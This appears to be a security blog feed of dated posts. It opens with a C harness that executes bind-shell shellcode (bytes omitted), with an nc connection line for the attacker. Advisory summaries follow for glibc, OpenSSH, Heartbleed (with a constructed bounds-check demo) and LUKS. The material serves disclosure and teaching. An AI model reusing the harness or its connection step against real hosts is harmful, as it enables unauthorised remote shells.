Jul 16 06
#include <stdio.h>
#include <string.h>
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
// Keep to two bytes
#define PORT "\x39\x39"
// The shellcode bytes themselves are not reproduced on this page; PORT is
// spliced into the byte string at the position the shellcode expects it.
unsigned char code[] = "" /* shellcode bytes omitted on this page */ PORT;
int main ()
{
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %zu Bytes Long\n", strlen((const char *)code));
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
    // Note: code lives in .data, which must be mapped executable for the call to work
	__asm__ volatile("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
		"call code");
	return 0;
}

written by d45id

Feb 16 18

Oh no! Google engineers discovered a stack-based buffer overflow vulnerability in the getaddrinfo() library function of the glibc DNS resolver, present in glibc versions since 2.9, which may allow a remote attacker to execute arbitrary code.


Jan 16 14

Today the OpenSSH project reported a bug in the client component of OpenSSH versions 5.4 up to 7.1.
The announced issue could allow an OpenSSH client to leak client memory, including (private) key material, to the SSH server it connects to. The vulnerability was found in the roaming feature of the OpenSSH client, which is active by default.

This vulnerability affects the OpenSSH client on most operating systems, such as Linux, FreeBSD and Mac OS X.


Aug 14 23

The latest on the Linux kernel from Linus Torvalds, Andrew Morton (Google), Shuah Khan (Samsung), Andy Lutomirski (AMA Capital Management) and Greg Kroah-Hartman (The Linux Foundation (Moderator)). From LinuxCon + CloudOpen North America 2014 in Chicago, IL.


Apr 14 07

„A potentially very serious bug in OpenSSL 1.0.1 and 1.0.2 beta has been discovered that can leak just about any information, from keys to content. Better yet, it appears to have been introduced in 2011, and known since March 2012.“ Juha Saarinen

„A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.“ security advisory

The attack may be repeated, and it appears trivial to acquire the host’s private key. If you were running a vulnerable release, it is even suggested that you go as far as revoking all of your keys. Distributions using OpenSSL 0.9.8 are not vulnerable (Debian Squeeze vintage). Debian Wheezy, Ubuntu 12.04.4, CentOS 6.5, Fedora 18, SuSE 12.2, OpenBSD 5.4, FreeBSD 8.4, and NetBSD 5.0.2 and all following releases are vulnerable. OpenSSL released 1.0.1g today addressing the vulnerability. Debian’s fix is in incoming and should hit mirrors soon; Fedora is having some trouble applying their patches, but a workaround patch to the package .spec (disabling heartbeats) is available for immediate application.

Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.
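As an added illustration of the missing bounds check the advisory describes (this is a constructed model, not code from the post or from OpenSSL itself), the unchecked handler trusts the peer-supplied payload length and copies memory beyond the received record, while the checked handler applies the length test that closes the leak. Function names, the record layout constants and the sample record are assumptions made for the demo.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of a heartbeat record body (RFC 6520 layout):
 * type(1) | payload_length(2, big-endian) | payload | padding(>=16). */
#define HB_PADDING  16
#define HB_RESPONSE 2

/* Unpatched-style handling: trusts the peer-supplied payload_length and copies
 * that many bytes, so the memcpy reads past the end of the received record. */
static size_t hb_reply_unchecked(const uint8_t *rec, size_t rec_len,
                                 uint8_t *out, size_t out_len)
{
    size_t payload = ((size_t)rec[1] << 8) | rec[2];
    (void)rec_len;                          /* never consulted: the bug */
    if (3 + payload > out_len) return 0;    /* keeps this demo memory-safe */
    out[0] = HB_RESPONSE; out[1] = rec[1]; out[2] = rec[2];
    memcpy(out + 3, rec + 3, payload);      /* over-read happens here */
    return payload;
}

/* Patched-style handling: header, declared payload and padding must all fit
 * inside the record actually received, otherwise the request is discarded. */
static size_t hb_reply_checked(const uint8_t *rec, size_t rec_len,
                               uint8_t *out, size_t out_len)
{
    if (rec_len < 1 + 2 + HB_PADDING) return 0;             /* discard */
    size_t payload = ((size_t)rec[1] << 8) | rec[2];
    if (1 + 2 + payload + HB_PADDING > rec_len) return 0;   /* discard */
    if (3 + payload > out_len) return 0;
    out[0] = HB_RESPONSE; out[1] = rec[1]; out[2] = rec[2];
    memcpy(out + 3, rec + 3, payload);
    return payload;
}

/* Constructed scenario: a 19-byte request with no payload claims 64 bytes;
 * a "secret" sits in memory right after the record. Returns 1 if the reply
 * built by the selected handler contains that secret. */
static int hb_demo_leaks_secret(int use_checked)
{
    static uint8_t mem[256];
    uint8_t out[128];
    memset(mem, 0, sizeof mem);
    memset(out, 0, sizeof out);
    mem[0] = 1; mem[1] = 0x00; mem[2] = 0x40;          /* request, len 64 */
    memcpy(mem + 19, "PRIVATE-KEY", 11);               /* data after record */
    size_t n = use_checked ? hb_reply_checked(mem, 19, out, sizeof out)
                           : hb_reply_unchecked(mem, 19, out, sizeof out);
    return n > 0 && memcmp(out + 19, "PRIVATE-KEY", 11) == 0;
}
```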


Jan 14 20

The new kernel version 3.13 now ships a new packet filter, nftables.
Nftables, developed by the Netfilter project, aims to replace the existing frameworks such as {ip,ip6,arp,eb}tables, which also originate from that project …

See also:

Talk about nftables at Kernel Recipes 2013
Nftables quick howto


Dec 13 23

Jakob Lell demonstrates in detail in his article „Practical malleability attack against CBC-Encrypted LUKS partitions“ how an attack on Linux system encryption with Linux Unified Key Setup (LUKS) in Cipher Block Chaining (CBC) mode can be carried out.


Nov 13 08

As the OpenSSH project announced in an advisory today, a memory corruption problem exists which in principle can lead to a remotely exploitable security hole.
Although this hole can apparently only be exploited after successful authentication to the system, it is still advisable to implement the stated workaround or to upgrade to the correspondingly patched version.

It is not yet known whether exploits that take advantage of this problem exist or are in use; since the OpenSSH source code is open, however, it must be assumed that this will very soon be the case.
